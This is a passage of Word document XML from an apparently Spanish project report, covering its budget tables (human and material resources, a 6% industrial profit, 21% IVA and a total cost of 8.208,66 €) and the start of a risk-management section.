          <w:p w14:paraId="6AE33847" w14:textId="6F78A9E0" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Analista de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F2DDBA" w14:textId="44B58381" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>250</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1801" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6530EBA1" w14:textId="6CB989A4" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1801" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CC6F22" w14:textId="50BE8EE9" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>25,029</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1801" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD0378D" w14:textId="6C162F43" w:rsidR="006061F5" w:rsidRDefault="00E1314B">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00B63F59">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>257,25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="511CC5F2" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E2BC64" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Beneficio industrial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF04206" w14:textId="68D4CC4D" w:rsidR="001567D7" w:rsidRPr="00A94AC5" w:rsidRDefault="003C1728" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para obtener el beneficio del proyecto, teniendo en cuenta la Ley 9/2017 de 8 de noviembre del BOE, este será un 6% del coste previo a la aplicación del IVA. Por lo tanto, el beneficio será el siguiente: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0E402C" w14:paraId="7EC0BFD6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00EEF442" w14:textId="10AECDA8" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tipo de recursos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A1D3D2C" w14:textId="7E851E05" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Coste</w:t>
            </w:r>
            <w:r w:rsidR="00485BA7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00485BA7" w:rsidRPr="0092637C">
              <w:t>€</w:t>
            </w:r>
            <w:r w:rsidR="00485BA7">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E402C" w14:paraId="0E290709" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="438C6DE7" w14:textId="6204FBA9" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Recursos materiales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6105D0" w14:textId="53DDA15F" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>142,77</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E402C" w14:paraId="6BD63734" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56FF8B28" w14:textId="39A74325" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Recursos humanos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="248A61CA" w14:textId="4B87ACD5" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00B05911">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>257,25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E402C" w14:paraId="3B21CC8C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1410C845" w14:textId="67ACB878" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Subtotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62DFB4A3" w14:textId="79A8606A" w:rsidR="000E402C" w:rsidRDefault="00485BA7">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00B05911">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>400,02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E402C" w14:paraId="32428D83" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB0EFF4" w14:textId="69D26F2F" w:rsidR="000E402C" w:rsidRDefault="000E402C">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Beneficio industrial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F215FF" w14:textId="7EFBBCE7" w:rsidR="000E402C" w:rsidRDefault="00F15705">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>384,0012</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3363BDEB" w14:textId="77777777" w:rsidR="003C1728" w:rsidRDefault="003C1728" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE28783" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Coste total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C949F" w14:textId="5FDC430B" w:rsidR="002366D6" w:rsidRPr="00A94AC5" w:rsidRDefault="002366D6" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Finalmente, tras haber calculado los costes y el beneficio industrial obtenido, se aplica el</w:t>
      </w:r>
      <w:r w:rsidR="00090C08" w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tipo general del</w:t>
      </w:r>
      <w:r w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> IVA </w:t>
      </w:r>
      <w:r w:rsidR="00090C08" w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(21%) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para obtener el coste total del proyecto. </w:t>
      </w:r>
      <w:r w:rsidR="0080580E" w:rsidRPr="00A94AC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La tabla de presupuestos en su versión final es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9D88D" w14:textId="77777777" w:rsidR="00073903" w:rsidRDefault="00073903" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>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80580E" w14:paraId="22F0E966" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31EC4C6D" w14:textId="73EE0AF0" w:rsidR="0080580E" w:rsidRDefault="0080580E">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Concepto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="513CC225" w14:textId="14EB09AB" w:rsidR="0080580E" w:rsidRDefault="0080580E">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Coste (</w:t>
            </w:r>
            <w:r w:rsidRPr="0092637C">
              <w:t>€</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080580E" w14:paraId="58E82361" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F36AD5F" w14:textId="145CEF27" w:rsidR="0080580E" w:rsidRDefault="0080580E">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Recursos materiales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA5DBA5" w14:textId="2DC695C3" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>142,77</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080580E" w14:paraId="131CAB22" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA2234B" w14:textId="6DA95C3B" w:rsidR="0080580E" w:rsidRDefault="0080580E">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Recursos humanos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5330D308" w14:textId="6F1E54CE" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6.257,25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080580E" w14:paraId="414EEF03" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DDDE6EE" w14:textId="1D84CD47" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Beneficio industrial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F11F69" w14:textId="4406CAA3" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>384,0012</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B05911" w14:paraId="5A3CB3D2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349802F5" w14:textId="10B29DD7" w:rsidR="00B05911" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Subtotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B649DE" w14:textId="31FA6C6D" w:rsidR="00B05911" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6.784,0212</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080580E" w14:paraId="27947423" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C342733" w14:textId="6AB62847" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">IVA </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47D09297" w14:textId="7E6E51C5" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1424,64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080580E" w14:paraId="0193A645" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05382EEC" w14:textId="4AD96F41" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Coste total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="576CBCCB" w14:textId="7E202362" w:rsidR="0080580E" w:rsidRDefault="00B05911">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>8.208,66</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D72022F" w14:textId="77777777" w:rsidR="00F51D78" w:rsidRDefault="00F51D78" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13757247" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BADBE6D" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736F0AA6"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45" w:name="_2.4__"/>
      <w:bookmarkStart w:id="46" w:name="_Toc107862693"/>
      <w:bookmarkStart w:id="47" w:name="_Toc170500162"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.4   GESTIÓN DE RIESGOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="0519A6FD" w14:textId="77777777" w:rsidR="00A57F00" w:rsidRDefault="00A57F00" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1B0252" w14:textId="3FF48F23" w:rsidR="00E95A92" w:rsidRDefault="00A57F00" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un análisis previo de los riesgos ha de ser realizado previamente a la realización del proyecto. En este apartado se incluirán los riesgos </w:t>
      </w:r>
      <w:r w:rsidR="006A62E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>identificados,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A62E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>incluyendo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A62E3">
        <w:rPr>
